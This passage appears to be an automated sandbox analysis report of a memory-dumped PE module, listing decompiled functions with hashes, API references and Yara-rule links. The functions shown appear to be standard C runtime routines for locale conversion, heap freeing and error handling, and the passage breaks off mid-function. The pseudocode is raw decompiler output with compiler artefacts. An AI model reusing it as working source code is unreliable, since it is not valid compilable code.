Opcode ID: 2c6eb4740c4342ab8a3525665da7c2eaf7ce9d2392c0b3d20cdf015804ea3a8d
Instruction ID: 9061cb366b589b9961d2ce01ec9ee1fd8626e6b7150f46ddf7e5a6f9bb5777f3
Opcode Fuzzy Hash: 2c6eb4740c4342ab8a3525665da7c2eaf7ce9d2392c0b3d20cdf015804ea3a8d
Instruction Fuzzy Hash: 6D71C2759415519FCF04CFA9C8C96BF7BF6BB4B310B20805BE452DB281E334A588DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C53EB, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1C53EB(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi) {
				void* _t35;
				short _t49;
				intOrPtr _t55;
				signed int _t58;
				intOrPtr _t66;
				void* _t70;
				void* _t78;

				_t61 = __edx;
				E6E1E014E(0x6e228264, __ebx, __edi, __esi, 0xa4);
				_t55 = __ecx;
				 *((intOrPtr*)(_t70 - 0x4c)) = __ecx;
				 *((intOrPtr*)(_t70 - 0x44)) = E6E201A3F(__ecx, __edx);
				_t35 = E6E1C91D8(__ecx, __edx, _t78, _t70 - 0x80);
				_t58 = 0xb;
				memcpy(_t70 - 0x40, _t35, _t58 << 2);
				_t66 =  *((intOrPtr*)(_t70 - 0x44));
				_t79 =  *((char*)(_t70 + 0xc));
				 *((intOrPtr*)(_t55 + 8)) = 0;
				 *((intOrPtr*)(_t55 + 0x10)) = 0;
				 *((intOrPtr*)(_t55 + 0x14)) = 0;
				 *((intOrPtr*)(_t70 - 4)) = 0;
				if( *((char*)(_t70 + 0xc)) == 0) {
					_t13 = _t66 + 8; // 0x0
					 *((intOrPtr*)(_t70 - 0x48)) =  *_t13;
				} else {
					 *((intOrPtr*)(_t70 - 0x48)) = 0x6e2394dd;
				}
				E6E1C91D8(_t55, _t61, _t79, _t70 - 0x80);
				_push(_t70 - 0xac);
				_push(0);
				 *((intOrPtr*)(_t55 + 8)) = E6E1C5B01(_t61, _t66, 0, _t70, _t79,  *((intOrPtr*)(_t70 - 0x48)));
				_push(_t70 - 0x40);
				 *((intOrPtr*)(_t55 + 0x10)) = E6E1A17AF(_t55, _t61, _t66, 0, _t70, _t79, "false", 0);
				_push(_t70 - 0x40);
				 *((intOrPtr*)(_t55 + 0x14)) = E6E1A17AF(_t55, _t61, _t66, 0, _t70, _t79, "true", 0);
				if( *((char*)(_t70 + 0xc)) == 0) {
					_t28 = _t66 + 0x30; // 0x0
					 *((short*)(_t55 + 0xc)) =  *((intOrPtr*)( *_t28));
					_t30 = _t66 + 0x34; // 0xc
					_t49 =  *((intOrPtr*)( *_t30));
				} else {
					 *((short*)(_t55 + 0xc)) = E6E1A177E(0x2e, 0, _t70 - 0x40);
					_t49 = E6E1A177E(0x2c, 0, _t70 - 0x40);
				}
				 *((short*)(_t55 + 0xe)) = _t49;
				return E6E1E009B(_t49, _t55, _t66, 0);
			}

APIs

__EH_prolog3_catch_GS.LIBCMT ref: 6E1C53F5
__Getcvt.LIBCPMT ref: 6E1C540B
__Getcvt.LIBCPMT ref: 6E1C5445

Strings

false, xrefs: 6E1C5466
true, xrefs: 6E1C547B

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: Getcvt$H_prolog3_catch_
String ID: false$true
API String ID: 1810345438-2658103896
Opcode ID: 129c42d73cfcf5854ee97412bfe206344c48cd21f45318dfbd16754a16eea946
Instruction ID: 4bf78b0fe211f568805d874adafc3feb958ab96c6a9681ce4094544948a97193
Opcode Fuzzy Hash: 129c42d73cfcf5854ee97412bfe206344c48cd21f45318dfbd16754a16eea946
Instruction Fuzzy Hash: F72194B6D01218EFDB01DFE4C880AEEBB78BF15714F144466E9049F600EB349995DFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6E20970F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,6E2096A5,?,?,6E209645,?,6E282D28,0000000C,6E20978A), ref: 6E20972F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6E209742
FreeLibrary.KERNEL32(00000000,?,?,?,6E2096A5,?,?,6E209645,?,6E282D28,0000000C,6E20978A), ref: 6E209765

Strings

mscoree.dll, xrefs: 6E209728
CorExitProcess, xrefs: 6E20973A

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 796e6444d5f5245c307bbaed419fb8c85de091e52bfd47d3223efb4feca62440
Instruction ID: 34003bfcad6186f19277b761f9977656ba6f3036cd36e95f19bf2f498b18fda9
Opcode Fuzzy Hash: 796e6444d5f5245c307bbaed419fb8c85de091e52bfd47d3223efb4feca62440
Instruction Fuzzy Hash: B0F0A4B190051DBFDF019F90C958F9EBFBAEB45712F104454A806A6150DB304A54DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E214E2A, Relevance: 7.7, APIs: 5, Instructions: 222
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E6E214E2A(void* __ebx, int __edx, void* __edi, char* _a4, short* _a8, int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v16;
				int _v20;
				int _v24;
				char* _v28;
				int _v32;
				char _v36;
				int _v44;
				char _v48;
				void* __esi;
				char* _t61;
				int _t63;
				int _t64;
				intOrPtr* _t65;
				signed int _t68;
				intOrPtr* _t71;
				short* _t73;
				int _t74;
				int _t76;
				char _t78;
				short* _t83;
				short _t85;
				int _t91;
				int _t93;
				char* _t98;
				int _t103;
				char* _t105;
				int _t106;
				int _t107;
				short* _t109;
				int _t110;
				int _t111;
				signed int _t112;

				_t106 = __edx;
				_v8 =  *0x6e28506c ^ _t112;
				_t61 = _a4;
				_t91 = _a12;
				_t111 = 0;
				_v28 = _t61;
				_v20 = 0;
				_t109 = _a8;
				_v24 = _t109;
				if(_t61 == 0 || _t91 != 0) {
					if(_t109 != 0) {
						E6E1F1F60(_t91,  &_v48, _t106, _a16);
						_t98 = _v28;
						if(_t98 == 0) {
							_t63 = _v44;
							if( *((intOrPtr*)(_t63 + 0xa8)) != _t111) {
								_t64 = WideCharToMultiByte( *(_t63 + 8), _t111, _t109, 0xffffffff, _t111, _t111, _t111,  &_v20);
								if(_t64 == 0 || _v20 != _t111) {
									L55:
									_t65 = E6E202281();
									_t110 = _t109 | 0xffffffff;
									 *_t65 = 0x2a;
									goto L56;
								} else {
									_t53 = _t64 - 1; // -1
									_t110 = _t53;
									L56:
									if(_v36 != 0) {
										 *(_v48 + 0x350) =  *(_v48 + 0x350) & 0xfffffffd;
									}
									goto L59;
								}
							}
							_t68 =  *_t109 & 0x0000ffff;
							if(_t68 == 0) {
								L51:
								_t110 = _t111;
								goto L56;
							}
							_t106 = 0xff;
							while(_t68 <= _t106) {
								_t109 =  &(_t109[1]);
								_t111 = _t111 + 1;
								_t68 =  *_t109 & 0x0000ffff;
								if(_t68 != 0) {
									continue;
								}
								goto L51;
							}
							goto L55;
						}
						_t106 = _v44;
						if( *((intOrPtr*)(_t106 + 0xa8)) != _t111) {
							if( *((intOrPtr*)(_t106 + 4)) != 1) {
								_t110 = WideCharToMultiByte( *(_t106 + 8), _t111, _t109, 0xffffffff, _t98, _t91, _t111,  &_v20);
								if(_t110 == 0) {
									if(_v20 != _t111 || GetLastError() != 0x7a) {
										L45:
										_t71 = E6E202281();
										_t111 = _t111 | 0xffffffff;
										 *_t71 = 0x2a;
										goto L51;
									} else {
										if(_t91 == 0) {
											goto L56;
										}
										_t73 = _v24;
										while(1) {
											_t107 = _v44;
											_t103 =  *(_t107 + 4);
											if(_t103 > 5) {
												_t103 = 5;
											}
											_t74 = WideCharToMultiByte( *(_t107 + 8), _t111, _t73, 1,  &_v16, _t103, _t111,  &_v20);
											_t93 = _a12;
											_t106 = _t74;
											if(_t106 == 0 || _v20 != _t111 || _t106 < 0 || _t106 > 5) {
												goto L55;
											}
											if(_t106 + _t110 > _t93) {
												goto L56;
											}
											_t76 = _t111;
											_v32 = _t76;
											if(_t106 <= 0) {
												L43:
												_t73 = _v24 + 2;
												_v24 = _t73;
												if(_t110 < _t93) {
													continue;
												}
												goto L56;
											}
											_t105 = _v28;
											while(1) {
												_t78 =  *((intOrPtr*)(_t112 + _t76 - 0xc));
												 *((char*)(_t105 + _t110)) = _t78;
												if(_t78 == 0) {
													goto L56;
												}
												_t76 = _v32 + 1;
												_t110 = _t110 + 1;
												_v32 = _t76;
												if(_t76 < _t106) {
													continue;
												}
												goto L43;
											}
											goto L56;
										}
										goto L55;
									}
								}
								if(_v20 != _t111) {
									goto L45;
								}
								_t28 = _t110 - 1; // -1
								_t111 = _t28;
								goto L51;
							}
							if(_t91 == 0) {
								L21:
								_t111 = WideCharToMultiByte( *(_t106 + 8), _t111, _t109, _t91, _t98, _t91, _t111,  &_v20);
								if(_t111 == 0 || _v20 != 0) {
									goto L45;
								} else {
									if(_v28[_t111 - 1] == 0) {
										_t111 = _t111 - 1;
									}
									goto L51;
								}
							}
							_t83 = _t109;
							_v24 = _t91;
							while( *_t83 != _t111) {
								_t83 =  &(_t83[1]);
								_t16 =  &_v24;
								 *_t16 = _v24 - 1;
								if( *_t16 != 0) {
									continue;
								}
								break;
							}
							if(_v24 != _t111 &&  *_t83 == _t111) {
								_t91 = (_t83 - _t109 >> 1) + 1;
							}
							goto L21;
						}
						if(_t91 == 0) {
							goto L51;
						}
						_t106 = 0xff;
						while( *_t109 <= _t106) {
							_t98[_t111] =  *_t109;
							_t85 =  *_t109;
							_t109 =  &(_t109[1]);
							if(_t85 == 0) {
								goto L51;
							}
							_t111 = _t111 + 1;
							if(_t111 < _t91) {
								continue;
							}
							goto L51;
						}
						goto L45;
					}
					 *((intOrPtr*)(E6E202281())) = 0x16;
					E6E20215B();
					goto L59;
				} else {
					L59:
					return E6E1DF8A5(_v8 ^ _t112, _t106, _t111);
				}
			}

0x6e214e2a
0x6e214e39
0x6e214e3c
0x6e214e40
0x6e214e44
0x6e214e46
0x6e214e49
0x6e214e4d
0x6e214e50
0x6e214e55
0x6e214e64
0x6e214e84
0x6e214e89
0x6e214e8e
0x6e21502b
0x6e215034
0x6e215066
0x6e21506e
0x6e21507a
0x6e21507a
0x6e21507f
0x6e215082
0x00000000
0x6e215075
0x6e215075
0x6e215075
0x6e215088
0x6e21508c
0x6e215091
0x6e215091
0x00000000
0x6e215098
0x6e21506e
0x6e215036
0x6e21503c
0x6e215054
0x6e215054
0x00000000
0x6e215054
0x6e21503e
0x6e215043
0x6e215048
0x6e21504b
0x6e21504c
0x6e215052
0x00000000
0x00000000
0x00000000
0x6e215052
0x00000000
0x6e215043
0x6e214e94
0x6e214e9d
0x6e214ed7
0x6e214f50
0x6e214f54
0x6e214f6a
0x6e21501b
0x6e21501b
0x6e215020
0x6e215023
0x00000000
0x6e214f7f
0x6e214f81
0x00000000
0x00000000
0x6e214f87
0x6e214f8a
0x6e214f8a
0x6e214f8d
0x6e214f93
0x6e214f97
0x6e214f97
0x6e214fa9
0x6e214faf
0x6e214fb2
0x6e214fb6
0x00000000
0x00000000
0x6e214fdb
0x00000000
0x00000000
0x6e214fe1
0x6e214fe3
0x6e214fe8
0x6e215008
0x6e21500b
0x6e21500e
0x6e215013
0x00000000
0x00000000
0x00000000
0x6e215019
0x6e214fea
0x6e214fed
0x6e214fed
0x6e214ff1
0x6e214ff6
0x00000000
0x00000000
0x6e214fff
0x6e215000
0x6e215001
0x6e215006
0x00000000
0x00000000
0x00000000
0x6e215006
0x00000000
0x6e214fed
0x00000000
0x6e214f8a
0x6e214f6a
0x6e214f59
0x00000000
0x00000000
0x6e214f5f
0x6e214f5f
0x00000000
0x6e214f5f
0x6e214edb
0x6e214f01
0x6e214f14
0x6e214f18
0x00000000
0x6e214f28
0x6e214f30
0x6e214f36
0x6e214f36
0x00000000
0x6e214f30
0x6e214f18
0x6e214edd
0x6e214edf
0x6e214ee2
0x6e214ee7
0x6e214eea
0x6e214eea
0x6e214eee
0x00000000
0x00000000
0x00000000
0x6e214eee
0x6e214ef3
0x6e214f00
0x6e214f00
0x00000000
0x6e214ef3
0x6e214ea1
0x00000000
0x00000000
0x6e214ea7
0x6e214eac
0x6e214eb7
0x6e214eba
0x6e214ebd
0x6e214ec3
0x00000000
0x00000000
0x6e214ec9
0x6e214ecc
0x00000000
0x00000000
0x00000000
0x6e214ece
0x00000000
0x6e214eac
0x6e214e6b
0x6e214e71
0x00000000
0x6e214e5b
0x6e21509a
0x6e2150aa
0x6e2150aa

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a922780fa2686a65b89e4e88ecd805d8e5f1adeb566fdaa0f56722fa6bd7de03
Instruction ID: 12ba495f18d550d402da53dc9144561aeb8492f18938f9b1c3e8a3880174dbdc
Opcode Fuzzy Hash: a922780fa2686a65b89e4e88ecd805d8e5f1adeb566fdaa0f56722fa6bd7de03
Instruction Fuzzy Hash: 0D71C23195821F9FDB118FD4C884AEFBBB6EF49315F140569EA2467280C7B18A46CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E20A737, Relevance: 7.6, APIs: 5, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E20A737(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x6e28506c;
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E6E201F1D( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = E6E1DF8FA(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0x4
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E6E1DF8FA(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E6E1DF8FA(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = E6E21AC0E(_t56);
						_t40 = E6E20CBD3(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = E6E21AC0E(_t56);
						E6E20CBD3(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x6e28506c;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

APIs

_free.LIBCMT ref: 6E20A7A9
_free.LIBCMT ref: 6E20A7C9

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 29c2e27ee775f1d7ec5e3d75cce2d5fce0701a74ab88fb8b18da25a0307c33c1
Instruction ID: 8da94122120482963eb3a4320ad06f220fef5720222b60db2f9d082a915d6608
Opcode Fuzzy Hash: 29c2e27ee775f1d7ec5e3d75cce2d5fce0701a74ab88fb8b18da25a0307c33c1
Instruction Fuzzy Hash: 4541F376E403089FCB10CFB8C880A9EB7F6EF89714B658569D515EB291E730E902CB81

Uniqueness

Uniqueness Score: -1.00%

Function 6E20D683, Relevance: 7.6, APIs: 5, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E6E20D683(void* __ecx, void* __edx) {
				intOrPtr _t2;
				void* _t4;
				void* _t10;
				void* _t11;
				void* _t13;
				void* _t16;
				long _t17;

				_t11 = __ecx;
				_t17 = GetLastError();
				_t10 = 0;
				_t2 =  *0x6e2851e4;
				_t20 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t16 = E6E20C7EF(_t11, 1, 0x364);
					_pop(_t13);
					if(_t16 != 0) {
						_t4 = E6E214196(_t13, __eflags,  *0x6e2851e4, _t16);
						__eflags = _t4;
						if(_t4 != 0) {
							E6E20D33F(_t13, _t16, 0x6e2876f0);
							E6E20CBD3(_t10);
							__eflags = _t16;
							if(_t16 != 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t16);
							goto L4;
						}
					} else {
						_push(_t10);
						L4:
						E6E20CBD3();
						L8:
						SetLastError(_t17);
					}
				} else {
					_t16 = E6E214140(_t11, _t20, _t2);
					if(_t16 != 0) {
						L9:
						SetLastError(_t17);
						_t10 = _t16;
					} else {
						goto L2;
					}
				}
				return _t10;
			}

APIs

GetLastError.KERNEL32(6E1C75D9,6E1C75D9,00000002,6E202286,6E20F2B0,00000000,?,6E1E0F8B,00000002,00000000,?,?,?,6E1A1298,6E1C75D9,00000004), ref: 6E20D688
_free.LIBCMT ref: 6E20D6BD
_free.LIBCMT ref: 6E20D6E4
SetLastError.KERNEL32(00000000,?,6E1C75D9), ref: 6E20D6F1
SetLastError.KERNEL32(00000000,?,6E1C75D9), ref: 6E20D6FA

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 9256923f6211c70c6007ca561d7b76528ed13b915af8fe9de6f52f7d882982f5
Instruction ID: 3fd612a2b0acf8b2f7574502f79f09eb6c195464633906ed7cd4893399175c3f
Opcode Fuzzy Hash: 9256923f6211c70c6007ca561d7b76528ed13b915af8fe9de6f52f7d882982f5
Instruction Fuzzy Hash: 7601F9BA18690A2FC30216E56C8DE8B277F9BC377A7240815F419971D1EFB088018974

Uniqueness

Uniqueness Score: -1.00%

Function 6E21CCC3, Relevance: 7.5, APIs: 5, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E21CCC3(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;

				_t21 = _a4;
				if(_t21 != 0) {
					_t7 =  *_t21;
					if( *_t21 !=  *0x6e2850b8) {
						E6E20CBD3(_t7);
					}
					_t8 =  *((intOrPtr*)(_t21 + 4));
					if( *((intOrPtr*)(_t21 + 4)) !=  *0x6e2850bc) {
						E6E20CBD3(_t8);
					}
					_t9 =  *((intOrPtr*)(_t21 + 8));
					if( *((intOrPtr*)(_t21 + 8)) !=  *0x6e2850c0) {
						E6E20CBD3(_t9);
					}
					_t10 =  *((intOrPtr*)(_t21 + 0x30));
					if( *((intOrPtr*)(_t21 + 0x30)) !=  *0x6e2850e8) {
						E6E20CBD3(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					if(_t6 !=  *0x6e2850ec) {
						return E6E20CBD3(_t6);
					}
				}
				return _t6;
			}

0x6e21ccc9
0x6e21ccce
0x6e21ccd0
0x6e21ccd8
0x6e21ccdb
0x6e21cce0
0x6e21cce1
0x6e21ccea
0x6e21cced
0x6e21ccf2
0x6e21ccf3
0x6e21ccfc
0x6e21ccff
0x6e21cd04
0x6e21cd05
0x6e21cd0e
0x6e21cd11
0x6e21cd16
0x6e21cd17
0x6e21cd20
0x00000000
0x6e21cd28
0x6e21cd20
0x6e21cd2b

APIs

_free.LIBCMT ref: 6E21CCDB

Part of subcall function 6E20CBD3: HeapFree.KERNEL32(00000000,00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000), ref: 6E20CBE9
Part of subcall function 6E20CBD3: GetLastError.KERNEL32(00000000,?,6E21CFAF,00000000,00000000,00000000,00000000,?,6E21D2B4,00000000,00000007,00000000,?,6E21C0FC,00000000,00000000), ref: 6E20CBFB

_free.LIBCMT ref: 6E21CCED
_free.LIBCMT ref: 6E21CCFF
_free.LIBCMT ref: 6E21CD11
_free.LIBCMT ref: 6E21CD23

Memory Dump Source

Source File: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000016.00000002.569060574.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000016.00000002.596415964.000000006E22A000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fd5f0ce6d73c023e692cb4d911f0e95239a34f474b052342646876797ed72f6d
Instruction ID: e149d2dc1def0b1a9da9ed15b6017ed24f4d6d6ec98fc70cf8cb8537728c5639
Opcode Fuzzy Hash: fd5f0ce6d73c023e692cb4d911f0e95239a34f474b052342646876797ed72f6d
Instruction Fuzzy Hash: C3F04479444A0E97CA54CAD4E4C6C9B37EFAA0AB117704C15E126DB551D730F98486F1

Uniqueness

Uniqueness Score: -1.00%

Function 6E207D8A, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E6E207D8A(void* __ebx, signed int __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
				signed int _v8;
				short _v10;
				short _v12;
				short _v14;
				short _v16;
				short _v18;
				short _v22;
				char _v24;
				signed int _v28;
				signed int* _v32;
				signed int _v33;
				signed int** _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				intOrPtr _v52;
				void* _v64;
				void* __esi;
				intOrPtr _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				void* _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				signed int _t104;
				intOrPtr _t105;
				signed int _t110;
				void* _t111;
				signed int _t116;
				signed int _t117;
				signed int _t129;
				void* _t133;
				signed int _t135;
				intOrPtr _t143;
				signed short* _t144;
				intOrPtr _t145;
				signed int** _t146;
				signed int _t147;
				signed int* _t148;
				signed int _t149;
				signed int _t152;
				signed short** _t154;
				signed int _t155;
				signed int _t159;
				signed int _t163;
				intOrPtr* _t171;
				signed short _t172;
				signed short* _t173;
				signed int** _t174;
				void* _t175;
				signed short* _t178;
				intOrPtr* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int** _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;

				_t149 = __ecx;
				_v8 =  *0x6e28506c ^ _t184;
				_t171 = _a12;
				_v52 = _a4;
				_t143 = _a24;
				_v40 = _a16;
				_v48 = _t171;
				_v44 = _t143;
				_t181 = _a20;
				_v32 = _t181;
				_t91 = _a8;
				if(_t91 == 0) {
					_t178 =  *(_t143 + 0x154);
				} else {
					if(_t91 == 1) {
						_t178 =  *(_t143 + 0x158);
					} else {
						_t178 =  *(_t143 + 0x15c);
					}
				}
				if( *((intOrPtr*)(_t143 + 0xac)) == 1) {
					goto L113;
				} else {
					_t163 = _t149 & 0xffffff00 | _a8 == 0x00000002;
					_v24 = 0x76c +  *((intOrPtr*)(_t171 + 0x14));
					_v33 = _t163;
					_v22 =  *((intOrPtr*)(_t171 + 0x10)) + 1;
					_v18 =  *((intOrPtr*)(_t171 + 0xc));
					_v16 =  *((intOrPtr*)(_t171 + 8));
					_v14 =  *((intOrPtr*)(_t171 + 4));
					_v12 =  *_t171;
					_v10 = 0;
					_t191 = _t163;
					if(_t163 == 0) {
						__eflags = 0;
						_t129 = E6E2141EF(0, 0,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t178, 0, 0, 0);
					} else {
						_t129 = E6E2143E3(0, _t191,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t178, 0, 0);
					}
					_t147 = _t129;
					if(_t147 == 0) {
						goto L113;
					} else {
						_t175 = _t147 + _t147;
						_t165 = _t175 + 8;
						asm("sbb eax, eax");
						if((_t175 + 0x00000008 & _t129) == 0) {
							_t181 = 0;
							__eflags = 0;
							L18:
							_v28 = _t181;
							if(_t181 == 0) {
								L30:
								E6E1CDEE1(0);
								_t181 = _v32;
								while(1) {
									L113:
									_t172 =  *_t178 & 0x0000ffff;
									__eflags = _t172;
									if(_t172 == 0) {
										break;
									}
									__eflags =  *_t181;
									if( *_t181 == 0) {
										L28:
										L29:
										return E6E1DF8A5(_v8 ^ _t184, _t172, _t181);
									}
									_v32 = 0;
									_t152 = 0;
									__eflags = 0;
									_v28 = _t178;
									_t144 = _t178;
									_t94 = _t172 & 0x0000ffff;
									do {
										_t144 =  &(_t144[1]);
										_t152 = _t152 + 1;
										__eflags =  *_t144 - _t94;
									} while ( *_t144 == _t94);
									_t95 = _t172 & 0x0000ffff;
									_v28 = _t144;
									_t145 = _v44;
									__eflags = _t95 - 0x64;
									if(__eflags > 0) {
										_t96 = _t95 - 0x68;
										__eflags = _t96;
										if(_t96 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L110:
												_push(0x49);
												L111:
												_pop(_t97);
												_t98 = E6E207154(_t145, _t153, _t178, _v52, _t97, _v48, _v40, _t181, _t145, _v32);
												_t185 = _t185 + 0x1c;
												__eflags = _t98;
												if(_t98 == 0) {
													 *((intOrPtr*)(E6E202281())) = 0x16;
													goto L29;
												}
												L112:
												_t178 = _v28;
												continue;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L110;
											}
											L108:
											_t154 = _v40;
											_t178 =  &(_t178[1]);
											 *( *_t154) = _t172;
											 *_t154 =  &(( *_t154)[1]);
											 *_t181 =  *_t181 - 1;
											continue;
										}
										_t102 = _t96 - 5;
										__eflags = _t102;
										if(_t102 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L105:
												_push(0x4d);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L105;
											}
											goto L108;
										}
										_t103 = _t102 - 6;
										__eflags = _t103;
										if(_t103 == 0) {
											_t153 = _t152 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												_v32 = 1;
												L100:
												_push(0x53);
												goto L111;
											}
											_t153 = _t153 - 1;
											__eflags = _t153;
											if(_t153 == 0) {
												goto L100;
											}
											goto L108;
										}
										_t104 = _t103 - 1;
										__eflags = _t104;
										if(_t104 == 0) {
											_t105 = _v48;
											__eflags =  *((intOrPtr*)(_t105 + 8)) - 0xb;
											if( *((intOrPtr*)(_t105 + 8)) > 0xb) {
												_t173 =  *(_t145 + 0x150);
											} else {
												_t173 =  *(_t145 + 0x14c);
											}
											__eflags = _t152 - 1;
											if(_t152 != 1) {
												L91:
												_t155 =  *_t173 & 0x0000ffff;
												__eflags = _t155;
												if(_t155 == 0) {
													goto L112;
												}
												_t146 = _v40;
												while(1) {
													__eflags =  *_t181;
													if( *_t181 <= 0) {
														goto L112;
													}
													_t173 =  &(_t173[1]);
													 *( *_t146) = _t155;
													 *_t146 =  &(( *_t146)[0]);
													 *_t181 =  *_t181 - 1;
													_t155 =  *_t173 & 0x0000ffff;
													__eflags = _t155;
													if(_t155 != 0) {
														continue;
													}
													goto L112;
												}
											} else {
												__eflags =  *_t181;
												if( *_t181 <= 0) {
													goto L91;
												}
